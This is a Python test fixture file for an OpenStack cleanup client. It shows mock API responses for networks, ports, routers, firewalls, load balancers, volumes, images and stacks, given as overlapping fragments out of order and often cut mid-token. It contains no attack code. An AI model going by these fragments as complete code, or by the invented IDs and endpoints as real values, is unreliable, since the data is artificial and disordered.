"{ \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1,",
"None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\":",
"u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason':",
"\"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\",",
"'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user':",
"\"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1,",
"NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\":",
"] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\":",
"METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\":",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None,",
"IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID",
"}, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"\"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\":",
"\"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\":",
"'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"[ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] },",
"\"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\"",
"\"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0]",
"\"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\":",
"\"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\":",
"\"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ]",
"\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS",
"\"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\":",
"[\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ]",
"{ u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/',",
"'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\":",
"\"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {},",
"PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST",
"= [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" },",
"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1]",
"u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\":",
"+ [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\":",
"\"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\":",
"\"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"]",
"False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ],",
"'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region':",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\",",
"'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080',",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{",
"'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"under the Apache License, Version 2.0 (the \"License\"); you may # not use",
"WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See",
"[\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access':",
"\"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\":",
"'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type':",
"{ \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ],",
"{ \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base':",
"= [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS =",
"'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id':",
"\"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\"",
"'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL':",
"{ \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST",
"= [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\",",
"], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS =",
"= [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"]",
"\"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False },",
"\"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\",",
"SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS =",
"\"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID,",
"port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, {",
"] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\":",
"= [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"]",
"True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False",
"\"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST =",
"{ \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"\"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\":",
"= [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\":",
"u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab',",
"an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either",
"Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud',",
"{u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] }",
"LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\":",
"\"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\":",
"{ \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None,",
"\"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ {",
"VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'}",
"= { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\",",
"'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints':",
"{ \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\"",
"\"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"} ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\":",
"} ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True,",
"\"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\":",
"\"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\":",
"'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service',",
"\"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" }",
"= { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\",",
"IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\":",
"\"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\",",
"policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\",",
"\"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0,",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\",",
"['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container':",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\":",
"LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\":",
"u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href':",
"\"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\",",
"ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\",",
"[], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\",",
"'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type':",
"{ \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\",",
"Copyright © 2014 Cloudwatt # # Licensed under the Apache License, Version 2.0",
"\"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\",",
"\"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] }",
"\"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\":",
"\"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0],",
"u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml',",
"\"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule",
"u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href':",
"12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\":",
"ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\":",
"rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\":",
"[FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy",
"}, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\":",
"under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL",
"'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292'",
"\"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\":",
"}, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [",
"{u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id':",
"\"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\":",
"VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\"",
"[{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute",
"'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type':",
"u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS",
"\"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\",",
"\"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT",
"{ \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\":",
"{ \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\":",
"\"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\",",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\",",
"= [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"]",
"SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\":",
"False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
